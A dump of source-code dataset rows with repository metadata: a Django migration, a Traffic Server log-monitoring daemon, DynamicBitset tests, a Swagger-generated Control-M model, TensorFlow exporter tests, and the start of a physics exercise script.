22d9ab4bf21ea11b6c751dd2350676d79a0f46d5 | 397 | py | Python | classroom/migrations/0025_myfile_file.py | Abulhusain/E-learing | 65cfe3125f1b6794572ef2daf89917976f0eac09 | [
"MIT"
] | 5 | 2019-06-19T03:47:17.000Z | 2020-06-11T17:46:50.000Z | classroom/migrations/0025_myfile_file.py | Abulhusain/E-learing | 65cfe3125f1b6794572ef2daf89917976f0eac09 | [
"MIT"
] | 3 | 2021-03-19T01:23:12.000Z | 2021-09-08T01:05:25.000Z | classroom/migrations/0025_myfile_file.py | seeej/digiwiz | 96ddfc22fe4c815feec3d75c30576fec5f344154 | [
"MIT"
] | 1 | 2021-06-04T05:58:15.000Z | 2021-06-04T05:58:15.000Z | # Generated by Django 2.2.2 on 2019-08-25 09:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('classroom', '0024_auto_20190825_1723'),
]
operations = [
migrations.AddField(
model_name='myfile',
name='file',
field=models.CharField(blank=True, max_length=100),
),
]
| 20.894737 | 63 | 0.602015 | 44 | 397 | 5.318182 | 0.818182 | 0.017094 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119298 | 0.282116 | 397 | 18 | 64 | 22.055556 | 0.701754 | 0.11335 | 0 | 0 | 1 | 0 | 0.12 | 0.065714 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22da72ceaa2598d408165e577728716dec2eb71a | 11,928 | py | Python | tmp/real_time_log_analy/logWatcher.py | hankai17/test | 8f38d999a7c6a92eac94b4d9dc8e444619d2144f | [
"MIT"
] | 7 | 2017-07-16T15:09:26.000Z | 2021-09-01T02:13:15.000Z | tmp/real_time_log_analy/logWatcher.py | hankai17/test | 8f38d999a7c6a92eac94b4d9dc8e444619d2144f | [
"MIT"
] | null | null | null | tmp/real_time_log_analy/logWatcher.py | hankai17/test | 8f38d999a7c6a92eac94b4d9dc8e444619d2144f | [
"MIT"
] | 3 | 2017-09-13T09:54:49.000Z | 2019-03-18T01:29:15.000Z | #!/usr/bin/env python
import os
import sys
import time
import errno
import stat
import datetime
import socket
import struct
import atexit
import logging
#from lru import LRUCacheDict
from logging import handlers
from task_manager import Job, taskManage
from ctypes import *
from urlparse import *
from multiprocessing import Process,Lock
from log_obj import CLog
from parse_conf import cConfParser
log_file = "timelog.log"
log_fmt = '%(asctime)s: %(message)s'
config_file = 'test.config'
domain_white_dict = {}
pps_ip_list = []
pps_port = 0
domain_sfx_err_count = 0
domain_sfx_err_rate = 0
ats_ip = ''
def daemonize(pid_file=None):
pid = os.fork()
if pid:
sys.exit(0)
os.chdir('/')
os.umask(0)
os.setsid()
_pid = os.fork()
if _pid:
sys.exit(0)
sys.stdout.flush()
sys.stderr.flush()
with open('/dev/null') as read_null, open('/dev/null', 'w') as write_null:
os.dup2(read_null.fileno(), sys.stdin.fileno())
os.dup2(write_null.fileno(), sys.stdout.fileno())
os.dup2(write_null.fileno(), sys.stderr.fileno())
if pid_file:
with open(pid_file, 'w+') as f:
f.write(str(os.getpid()))
atexit.register(os.remove, pid_file)
def get_suffix(p):
if len(p) == 1:
#return "pure domain"
return "nil"
fields = p.split("/")
if len(fields) == 0 or len(fields) == 1:
return "null"
fields1 = fields[len(fields) - 1].split(".")
if len(fields1) == 0 or len(fields1) == 1:
return "null"
else:
return fields1[len(fields1) - 1]
class LogWatcher(object):
def __init__(self, folder, callback, extensions=["log"], logfile_keyword="squid", tail_lines=0):
self.files_map = {}
self.callback = callback
self.folder = os.path.realpath(folder)
self.extensions = extensions
self.logfile_kw = logfile_keyword
assert os.path.exists(self.folder), "%s does not exists" % self.folder
assert callable(callback)
self.update_files()
for id, file in self.files_map.iteritems():
file.seek(os.path.getsize(file.name)) # EOF
if tail_lines:
lines = self.tail(file.name, tail_lines)
if lines:
self.callback(file.name, lines)
def __del__(self):
self.close()
def loop(self, interval=0.1, async=False):
while 1:
try:
self.update_files()
for fid, file in list(self.files_map.iteritems()):
self.readfile(file)
if async:
return
time.sleep(interval)
except KeyboardInterrupt:
break
def log(self, line):
print line
def listdir(self):
ls = os.listdir(self.folder)
if self.extensions:
return [x for x in ls if os.path.splitext(x)[1][1:] in self.extensions and self.logfile_kw in os.path.split(x)[1] ]
else:
return ls
@staticmethod
def tail(fname, window):
try:
f = open(fname, 'r')
except IOError, err:
if err.errno == errno.ENOENT:
return []
else:
raise
else:
BUFSIZ = 1024
f.seek(0, os.SEEK_END)
fsize = f.tell()
block = -1
data = ""
exit = False
while not exit:
step = (block * BUFSIZ)
if abs(step) >= fsize:
f.seek(0)
exit = True
else:
f.seek(step, os.SEEK_END)
data = f.read().strip()
if data.count('\n') >= window:
break
else:
block -= 1
return data.splitlines()[-window:]
def update_files(self):
ls = []
if os.path.isdir(self.folder):
for name in self.listdir():
absname = os.path.realpath(os.path.join(self.folder, name))
try:
st = os.stat(absname)
except EnvironmentError, err:
if err.errno != errno.ENOENT:
raise
else:
if not stat.S_ISREG(st.st_mode):
continue
fid = self.get_file_id(st)
ls.append((fid, absname))
elif os.path.isfile(self.folder):
absname = os.path.realpath(self.folder)
try:
st = os.stat(absname)
except EnvironmentError, err:
if err.errno != errno.ENOENT:
raise
else:
fid = self.get_file_id(st)
ls.append((fid, absname))
else:
print 'You submitted an object that was neither a file or folder...exiting now.'
sys.exit()
for fid, file in list(self.files_map.iteritems()):
try:
st = os.stat(file.name)
except EnvironmentError, err:
if err.errno == errno.ENOENT:
self.unwatch(file, fid)
else:
raise
else:
if fid != self.get_file_id(st):
self.unwatch(file, fid)
self.watch(file.name)
for fid, fname in ls:
if fid not in self.files_map:
self.watch(fname)
def readfile(self, file):
lines = file.readlines()
if lines:
self.callback(file.name, lines)
def watch(self, fname):
try:
file = open(fname, "r")
fid = self.get_file_id(os.stat(fname))
except EnvironmentError, err:
if err.errno != errno.ENOENT:
raise
else:
self.log("watching logfile %s" % fname)
self.files_map[fid] = file
def unwatch(self, file, fid):
lines = self.readfile(file)
self.log("un-watching logfile %s" % file.name)
del self.files_map[fid]
if lines:
self.callback(file.name, lines)
@staticmethod
def get_file_id(st):
return "%xg%x" % (st.st_dev, st.st_ino)
def close(self):
for id, file in self.files_map.iteritems():
file.close()
self.files_map.clear()
def udp_send_message(ip_list, port, arr):
for ip in ip_list:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(arr, (ip, port))
s.close()
def pull_data(job):
if not (job.sfx == "nil" or job.sfx == "null"):
fmt = "=HHHH%dsH%dsH" %(len(job.url),len(job.sfx))
data = struct.pack(
fmt,
80, #id
1, #type
8 + len(job.url) + 2 + len(job.sfx) + 1, #length
len(job.url), #domain_len
job.url, #domain
len(job.sfx), #sfx_len
job.sfx, #sfx
0
)
else:
fmt = "=HHHH%dsH" %(len(job.url))
data = struct.pack(
fmt,
80, #id
1, #type
8 + len(job.url) + 1, #length
len(job.url), #domain_len
job.url,
0
)
global pps_ip_list
global pps_port
udp_send_message(pps_ip_list, pps_port, data)
tmg.done_task_add(job)
log_message = job.url + ' ' + job.sfx
loger.write(20, log_message)
def callback_routine(idx):
print 'callback_routinue'
def get_domain_white(f):
if len(f) == 0:
print 'No domain_white_list'
return
filename = f
fd = open(filename, 'r')
for line in fd.readlines():
line = line.strip()
if not domain_white_dict.has_key(line):
domain_white_dict[line] = 1
print 'parse domain_white_list done'
def period_check_task(job):
global txn_idx
global once_flag
if txn_idx == 0 and once_flag == 0:
once_flag = 1
tmg.done_task_add(job)
job.addtime = time.time()
tmg.task_add(job)
return
loger.write(10, '------>')
mutex.acquire()
for k in d1.keys():
if domain_white_dict.has_key(k):
continue
for k1 in d1[k].keys():
err_rate = d1[k][k1]['not_ok'] * 100 / (d1[k][k1]['not_ok'] + d1[k][k1]['20x'])
log_message = k + ' ' + str(err_rate)
loger.write(10, log_message)
global domain_sfx_err_count
global domain_sfx_err_rate
if err_rate >= domain_sfx_err_rate and (d1[k][k1]['not_ok'] + d1[k][k1]['20x']) >= domain_sfx_err_count :
#print "will add to task", k, k1, "ok:", d1[k][k1]['20x'], "not_ok:", d1[k][k1]['not_ok'], "err rate:", err_rate
txn_idx += 1
job = Job(txn_idx, pull_data, time.time(), 0, k, '', callback_routine, k1, '')
tmg.task_add(job)
loger.write(10, '<------')
d1.clear()
mutex.release()
tmg.done_task_add(job)
if job.period > 0:
job.addtime = time.time()
tmg.task_add(job)
def config_parse():
global domain_sfx_err_count
global domain_sfx_err_rate
global pps_ip_list
global pps_port
global ats_ip
cp = cConfParser(config_file)
pps_ip = cp.get('common', 'pps_ip')
fields = pps_ip.strip().split('|')
if len(fields) > 0:
for i in fields:
pps_ip_list.append(i)
else:
pps_ip_list.append(pps_ip)
pps_port = int(cp.get('common', 'pps_port'))
domain_sfx_err_count = int(cp.get('common', 'domain_sfx_err_count' ))
domain_sfx_err_rate = int(cp.get('common', 'domain_sfx_err_rate' ))
ats_ip = cp.get('common', 'ats_ip')
print 'ats_ip: ', ats_ip
print 'pps_ip: ', pps_ip
print 'pps_port: ', pps_port
print 'domain_sfx_err_count: ', domain_sfx_err_count
print 'domain_sfx_err_rate: ', domain_sfx_err_rate
return cp
once_flag = 0
txn_idx = 0
d1 = {}
mutex = Lock()
version_message = '1.0.1'
#1.0.1: Add conf obj; Add log obj
#1.0.2: More pps. add tool config
if __name__ == '__main__':
help_message = 'Usage: python %s' % sys.argv[0]
if len(sys.argv) == 2 and (sys.argv[1] in '--version'):
print version_message
exit(1)
if len(sys.argv) == 2 and (sys.argv[1] in '--help'):
print help_message
exit(1)
if len(sys.argv) != 1:
print help_message
exit(1)
cp = config_parse()
get_domain_white(cp.get('common', 'domain_white_list'))
loger = CLog(log_file, log_fmt, 12, 5, cp.get('common', 'debug'))
print 'Start ok'
daemonize()
tmg = taskManage()
tmg.run()
pull_pps_job = Job(txn_idx, period_check_task, time.time(), int(cp.get('common', 'interval')), '', '', callback_routine, '', '')
tmg.task_add(pull_pps_job)
def callback(filename, lines):
for line in lines:
fields = line.strip().split("'")
http_code = fields[23]
domain = fields[13]
log_message = 'new line ' + domain
#loger.write(10, log_message)
if len(domain.split(":")) > 0:
domain = domain.split(":")[0]
user_ip = fields[5]
result = urlparse(fields[15])
sfx = get_suffix(result.path)
if sfx == 'nil' or sfx == 'null':
continue
if len(domain) <= 3:
continue
#is watch req
global ats_ip
if user_ip == ats_ip:
continue
mutex.acquire()
sfx_dict = None
if not d1.has_key(domain):
d1[domain] = {}
sfx_dict = d1[domain]
else:
sfx_dict = d1[domain]
if not sfx_dict.has_key(sfx):
sfx_dict[sfx] = {'20x':0, 'not_ok':0}
if not(http_code in "200" or http_code in "206" or http_code in "304" or http_code in "204"):
sfx_dict[sfx]['not_ok'] += 1
else:
sfx_dict[sfx]['20x'] += 1
mutex.release()
l = LogWatcher("/opt/ats/var/log/trafficserver", callback)
l.loop()
#https://docs.python.org/2/library/ctypes.html
#https://blog.csdn.net/u012611644/article/details/80529746
| 29.021898 | 132 | 0.550889 | 1,607 | 11,928 | 3.927194 | 0.184194 | 0.024243 | 0.030423 | 0.02155 | 0.261607 | 0.211535 | 0.19569 | 0.151006 | 0.11583 | 0.077167 | 0 | 0.021374 | 0.321429 | 11,928 | 410 | 133 | 29.092683 | 0.75834 | 0.037643 | 0 | 0.317416 | 0 | 0 | 0.061273 | 0.004451 | 0 | 0 | 0 | 0 | 0.005618 | 0 | null | null | 0 | 0.047753 | null | null | 0.039326 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22df608412513a1bf5e311a4eae60aa3f6a7a737 | 1,609 | py | Python | python/test/test_dynamic_bitset.py | hagabb/katana | a52a688b90315a79aa95cf8d279fd7f949a3b94b | [
"BSD-3-Clause"
] | null | null | null | python/test/test_dynamic_bitset.py | hagabb/katana | a52a688b90315a79aa95cf8d279fd7f949a3b94b | [
"BSD-3-Clause"
] | null | null | null | python/test/test_dynamic_bitset.py | hagabb/katana | a52a688b90315a79aa95cf8d279fd7f949a3b94b | [
"BSD-3-Clause"
] | null | null | null | import pytest
from katana.dynamic_bitset import DynamicBitset
__all__ = []
SIZE = 50
@pytest.fixture
def dbs():
return DynamicBitset(SIZE)
def test_set(dbs):
dbs[10] = 1
assert dbs[10]
def test_set_invalid_type(dbs):
try:
dbs[2.3] = 0
assert False
except TypeError:
pass
def test_set_invalid_index_low(dbs):
try:
dbs[-1] = 1
assert False
except IndexError:
pass
def test_set_invalid_index_high(dbs):
try:
dbs[SIZE] = 1
assert False
except IndexError:
pass
def test_reset(dbs):
dbs[10] = 1
dbs.reset()
assert not dbs[10]
assert len(dbs) == SIZE
def test_reset_index(dbs):
dbs[10] = 1
dbs[10] = 0
assert not dbs[10]
def test_reset_begin_end(dbs):
dbs[10] = 1
dbs[15] = 1
dbs[12:17] = 0
assert dbs[10]
assert not dbs[15]
def test_reset_begin_end_invalid_step(dbs):
try:
dbs[12:17:22] = 0
assert False
except ValueError:
pass
def test_reset_none_end(dbs):
dbs[10] = 1
dbs[15] = 1
dbs[:12] = 0
assert not dbs[10]
assert dbs[15]
def test_resize(dbs):
dbs.resize(20)
assert len(dbs) == 20
dbs[8] = 1
dbs.resize(20)
assert len(dbs) == 20
assert dbs[8]
dbs.resize(70)
assert len(dbs) == 70
assert dbs[8]
assert dbs.count() == 1
def test_clear(dbs):
dbs[10] = 1
dbs.clear()
assert len(dbs) == 0
dbs.resize(20)
assert len(dbs) == 20
assert not dbs[10]
def test_count(dbs):
dbs[10] = 1
assert dbs.count() == 1
| 14.898148 | 47 | 0.580485 | 245 | 1,609 | 3.673469 | 0.208163 | 0.077778 | 0.062222 | 0.07 | 0.48 | 0.36 | 0.234444 | 0.206667 | 0.051111 | 0.051111 | 0 | 0.082216 | 0.304537 | 1,609 | 107 | 48 | 15.037383 | 0.722073 | 0 | 0 | 0.513158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.289474 | 1 | 0.171053 | false | 0.052632 | 0.026316 | 0.013158 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
22e1bc52c4e28d18d68ad09f117367db41946c7e | 5,679 | py | Python | src/clients/ctm_api_client/models/user_additional_properties.py | IceT-M/ctm-python-client | 0ef1d8a3c9a27a01c088be1cdf5d177d25912bac | [
"BSD-3-Clause"
] | 5 | 2021-12-01T18:40:00.000Z | 2022-03-04T10:51:44.000Z | src/clients/ctm_api_client/models/user_additional_properties.py | IceT-M/ctm-python-client | 0ef1d8a3c9a27a01c088be1cdf5d177d25912bac | [
"BSD-3-Clause"
] | 3 | 2022-02-21T20:08:32.000Z | 2022-03-16T17:41:03.000Z | src/clients/ctm_api_client/models/user_additional_properties.py | IceT-M/ctm-python-client | 0ef1d8a3c9a27a01c088be1cdf5d177d25912bac | [
"BSD-3-Clause"
] | 7 | 2021-12-01T11:59:16.000Z | 2022-03-01T18:16:40.000Z | # coding: utf-8
"""
Control-M Services
Provides access to BMC Control-M Services # noqa: E501
OpenAPI spec version: 9.20.215
Contact: customer_support@bmc.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from clients.ctm_api_client.configuration import Configuration
class UserAdditionalProperties(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
"member_of_groups": "list[str]",
"authentication": "AuthenticationData",
"is_external_user": "bool",
}
attribute_map = {
"member_of_groups": "memberOfGroups",
"authentication": "authentication",
"is_external_user": "isExternalUser",
}
def __init__(
self,
member_of_groups=None,
authentication=None,
is_external_user=None,
_configuration=None,
): # noqa: E501
"""UserAdditionalProperties - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._member_of_groups = None
self._authentication = None
self._is_external_user = None
self.discriminator = None
if member_of_groups is not None:
self.member_of_groups = member_of_groups
if authentication is not None:
self.authentication = authentication
if is_external_user is not None:
self.is_external_user = is_external_user
@property
def member_of_groups(self):
"""Gets the member_of_groups of this UserAdditionalProperties. # noqa: E501
List of role names # noqa: E501
:return: The member_of_groups of this UserAdditionalProperties. # noqa: E501
:rtype: list[str]
"""
return self._member_of_groups
@member_of_groups.setter
def member_of_groups(self, member_of_groups):
"""Sets the member_of_groups of this UserAdditionalProperties.
List of role names # noqa: E501
:param member_of_groups: The member_of_groups of this UserAdditionalProperties. # noqa: E501
:type: list[str]
"""
self._member_of_groups = member_of_groups
@property
def authentication(self):
"""Gets the authentication of this UserAdditionalProperties. # noqa: E501
user authentication # noqa: E501
:return: The authentication of this UserAdditionalProperties. # noqa: E501
:rtype: AuthenticationData
"""
return self._authentication
@authentication.setter
def authentication(self, authentication):
"""Sets the authentication of this UserAdditionalProperties.
user authentication # noqa: E501
:param authentication: The authentication of this UserAdditionalProperties. # noqa: E501
:type: AuthenticationData
"""
self._authentication = authentication
@property
def is_external_user(self):
"""Gets the is_external_user of this UserAdditionalProperties. # noqa: E501
:return: The is_external_user of this UserAdditionalProperties. # noqa: E501
:rtype: bool
"""
return self._is_external_user
@is_external_user.setter
def is_external_user(self, is_external_user):
"""Sets the is_external_user of this UserAdditionalProperties.
:param is_external_user: The is_external_user of this UserAdditionalProperties. # noqa: E501
:type: bool
"""
self._is_external_user = is_external_user
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
)
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict")
else item,
value.items(),
)
)
else:
result[attr] = value
if issubclass(UserAdditionalProperties, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UserAdditionalProperties):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, UserAdditionalProperties):
return True
return self.to_dict() != other.to_dict()
| 30.207447 | 101 | 0.611727 | 617 | 5,679 | 5.421394 | 0.212318 | 0.045441 | 0.079522 | 0.09148 | 0.40867 | 0.34858 | 0.326756 | 0.1429 | 0.121375 | 0.02272 | 0 | 0.015463 | 0.305335 | 5,679 | 187 | 102 | 30.368984 | 0.832446 | 0.312555 | 0 | 0.055556 | 1 | 0 | 0.055489 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.044444 | 0 | 0.322222 | 0.022222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22e6c10685bc8e3a610b18ebd720a7487a124de6 | 9,576 | py | Python | object_detection/exporter_test.py | travisyates81/object-detection | 931bebfa54798c08d2c401e9c1bad39015d8c832 | [
"MIT"
] | 1 | 2019-09-19T18:24:55.000Z | 2019-09-19T18:24:55.000Z | object_detection/exporter_test.py | travisyates81/object-detection | 931bebfa54798c08d2c401e9c1bad39015d8c832 | [
"MIT"
] | null | null | null | object_detection/exporter_test.py | travisyates81/object-detection | 931bebfa54798c08d2c401e9c1bad39015d8c832 | [
"MIT"
] | null | null | null | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Travis Yates
"""Tests for object_detection.export_inference_graph."""
import os
import mock
import numpy as np
import tensorflow as tf
from object_detection import exporter
from object_detection.builders import model_builder
from object_detection.core import model
from object_detection.protos import pipeline_pb2
class FakeModel(model.DetectionModel):
def preprocess(self, inputs):
return (tf.identity(inputs) *
tf.get_variable('dummy', shape=(),
initializer=tf.constant_initializer(2),
dtype=tf.float32))
def predict(self, preprocessed_inputs):
return {'image': tf.identity(preprocessed_inputs)}
def postprocess(self, prediction_dict):
with tf.control_dependencies(prediction_dict.values()):
return {
'detection_boxes': tf.constant([[0.0, 0.0, 0.5, 0.5],
[0.5, 0.5, 0.8, 0.8]], tf.float32),
'detection_scores': tf.constant([[0.7, 0.6]], tf.float32),
'detection_classes': tf.constant([[0, 1]], tf.float32),
'num_detections': tf.constant([2], tf.float32)
}
def restore_fn(self, checkpoint_path, from_detection_checkpoint):
pass
def loss(self, prediction_dict):
pass
class ExportInferenceGraphTest(tf.test.TestCase):
def _save_checkpoint_from_mock_model(self, checkpoint_path,
use_moving_averages):
g = tf.Graph()
with g.as_default():
mock_model = FakeModel(num_classes=1)
mock_model.preprocess(tf.constant([1, 3, 4, 3], tf.float32))
if use_moving_averages:
tf.train.ExponentialMovingAverage(0.0).apply()
saver = tf.train.Saver()
init = tf.global_variables_initializer()
with self.test_session() as sess:
sess.run(init)
saver.save(sess, checkpoint_path)
def _load_inference_graph(self, inference_graph_path):
od_graph = tf.Graph()
with od_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(inference_graph_path) as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
return od_graph
def _create_tf_example(self, image_array):
with self.test_session():
encoded_image = tf.image.encode_jpeg(tf.constant(image_array)).eval()
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
example = tf.train.Example(features=tf.train.Features(feature={
'image/encoded': _bytes_feature(encoded_image),
'image/format': _bytes_feature('jpg'),
'image/source_id': _bytes_feature('image_id')
})).SerializeToString()
return example
def test_export_graph_with_image_tensor_input(self):
with mock.patch.object(
model_builder, 'build', autospec=True) as mock_builder:
mock_builder.return_value = FakeModel(num_classes=1)
inference_graph_path = os.path.join(self.get_temp_dir(),
'exported_graph.pbtxt')
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_config.use_moving_averages = False
exporter.export_inference_graph(
input_type='image_tensor',
pipeline_config=pipeline_config,
checkpoint_path=None,
inference_graph_path=inference_graph_path)
def test_export_graph_with_tf_example_input(self):
with mock.patch.object(
model_builder, 'build', autospec=True) as mock_builder:
mock_builder.return_value = FakeModel(num_classes=1)
inference_graph_path = os.path.join(self.get_temp_dir(),
'exported_graph.pbtxt')
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_config.use_moving_averages = False
exporter.export_inference_graph(
input_type='tf_example',
pipeline_config=pipeline_config,
checkpoint_path=None,
inference_graph_path=inference_graph_path)
def test_export_frozen_graph(self):
checkpoint_path = os.path.join(self.get_temp_dir(), 'model-ckpt')
self._save_checkpoint_from_mock_model(checkpoint_path,
use_moving_averages=False)
inference_graph_path = os.path.join(self.get_temp_dir(),
'exported_graph.pb')
with mock.patch.object(
model_builder, 'build', autospec=True) as mock_builder:
mock_builder.return_value = FakeModel(num_classes=1)
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_config.use_moving_averages = False
exporter.export_inference_graph(
input_type='image_tensor',
pipeline_config=pipeline_config,
checkpoint_path=checkpoint_path,
inference_graph_path=inference_graph_path)
def test_export_frozen_graph_with_moving_averages(self):
checkpoint_path = os.path.join(self.get_temp_dir(), 'model-ckpt')
self._save_checkpoint_from_mock_model(checkpoint_path,
use_moving_averages=True)
inference_graph_path = os.path.join(self.get_temp_dir(),
'exported_graph.pb')
with mock.patch.object(
model_builder, 'build', autospec=True) as mock_builder:
mock_builder.return_value = FakeModel(num_classes=1)
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_config.use_moving_averages = True
exporter.export_inference_graph(
input_type='image_tensor',
pipeline_config=pipeline_config,
checkpoint_path=checkpoint_path,
inference_graph_path=inference_graph_path)
def test_export_and_run_inference_with_image_tensor(self):
checkpoint_path = os.path.join(self.get_temp_dir(), 'model-ckpt')
self._save_checkpoint_from_mock_model(checkpoint_path,
use_moving_averages=False)
inference_graph_path = os.path.join(self.get_temp_dir(),
'exported_graph.pb')
with mock.patch.object(
model_builder, 'build', autospec=True) as mock_builder:
mock_builder.return_value = FakeModel(num_classes=1)
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_config.use_moving_averages = False
exporter.export_inference_graph(
input_type='image_tensor',
pipeline_config=pipeline_config,
checkpoint_path=checkpoint_path,
inference_graph_path=inference_graph_path)
inference_graph = self._load_inference_graph(inference_graph_path)
with self.test_session(graph=inference_graph) as sess:
image_tensor = inference_graph.get_tensor_by_name('image_tensor:0')
boxes = inference_graph.get_tensor_by_name('detection_boxes:0')
scores = inference_graph.get_tensor_by_name('detection_scores:0')
classes = inference_graph.get_tensor_by_name('detection_classes:0')
num_detections = inference_graph.get_tensor_by_name('num_detections:0')
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: np.ones((1, 4, 4, 3)).astype(np.uint8)})
self.assertAllClose(boxes, [[0.0, 0.0, 0.5, 0.5],
[0.5, 0.5, 0.8, 0.8]])
self.assertAllClose(scores, [[0.7, 0.6]])
self.assertAllClose(classes, [[1, 2]])
self.assertAllClose(num_detections, [2])
def test_export_and_run_inference_with_tf_example(self):
checkpoint_path = os.path.join(self.get_temp_dir(), 'model-ckpt')
self._save_checkpoint_from_mock_model(checkpoint_path,
use_moving_averages=False)
inference_graph_path = os.path.join(self.get_temp_dir(),
'exported_graph.pb')
with mock.patch.object(
model_builder, 'build', autospec=True) as mock_builder:
mock_builder.return_value = FakeModel(num_classes=1)
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_config.use_moving_averages = False
exporter.export_inference_graph(
input_type='tf_example',
pipeline_config=pipeline_config,
checkpoint_path=checkpoint_path,
inference_graph_path=inference_graph_path)
inference_graph = self._load_inference_graph(inference_graph_path)
with self.test_session(graph=inference_graph) as sess:
tf_example = inference_graph.get_tensor_by_name('tf_example:0')
boxes = inference_graph.get_tensor_by_name('detection_boxes:0')
scores = inference_graph.get_tensor_by_name('detection_scores:0')
classes = inference_graph.get_tensor_by_name('detection_classes:0')
num_detections = inference_graph.get_tensor_by_name('num_detections:0')
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={tf_example: self._create_tf_example(
np.ones((4, 4, 3)).astype(np.uint8))})
self.assertAllClose(boxes, [[0.0, 0.0, 0.5, 0.5],
[0.5, 0.5, 0.8, 0.8]])
self.assertAllClose(scores, [[0.7, 0.6]])
self.assertAllClose(classes, [[1, 2]])
self.assertAllClose(num_detections, [2])
if __name__ == '__main__':
tf.test.main()
| 44.539535 | 77 | 0.680138 | 1,181 | 9,576 | 5.159187 | 0.130398 | 0.105695 | 0.064993 | 0.022977 | 0.684064 | 0.669457 | 0.659938 | 0.651567 | 0.651567 | 0.651567 | 0 | 0.016752 | 0.22076 | 9,576 | 214 | 78 | 44.747664 | 0.799786 | 0.012949 | 0 | 0.591398 | 0 | 0 | 0.057497 | 0 | 0 | 0 | 0 | 0 | 0.043011 | 1 | 0.080645 | false | 0.010753 | 0.048387 | 0.016129 | 0.172043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22f3312bdb283b4ef7d6f8aa9f88ddb5c8c89e30 | 662 | py | Python | ch_4/stopping_length.py | ProhardONE/python_primer | 211e37c1f2fd169269fc4f3c08e8b7e5225f2ad0 | [
"MIT"
] | 51 | 2016-04-05T16:56:11.000Z | 2022-02-08T00:08:47.000Z | ch_4/stopping_length.py | zhangxiao921207/python_primer | 211e37c1f2fd169269fc4f3c08e8b7e5225f2ad0 | [
"MIT"
] | null | null | null | ch_4/stopping_length.py | zhangxiao921207/python_primer | 211e37c1f2fd169269fc4f3c08e8b7e5225f2ad0 | [
"MIT"
] | 47 | 2016-05-02T07:51:37.000Z | 2022-02-08T01:28:15.000Z | # Exercise 4.11
# Author: Noah Waterfield Price
import sys
g = 9.81 # acceleration due to gravity
try:
# initial velocity (convert to m/s)
v0 = (1000. / 3600) * float(sys.argv[1])
mu = float(sys.argv[2]) # coefficient of friction
except IndexError:
print 'Both v0 (in km/s) and mu must be supplied on the command line'
v0 = (1000. / 3600) * float(raw_input('v0 = ?\n'))
mu = float(raw_input('mu = ?\n'))
except ValueError:
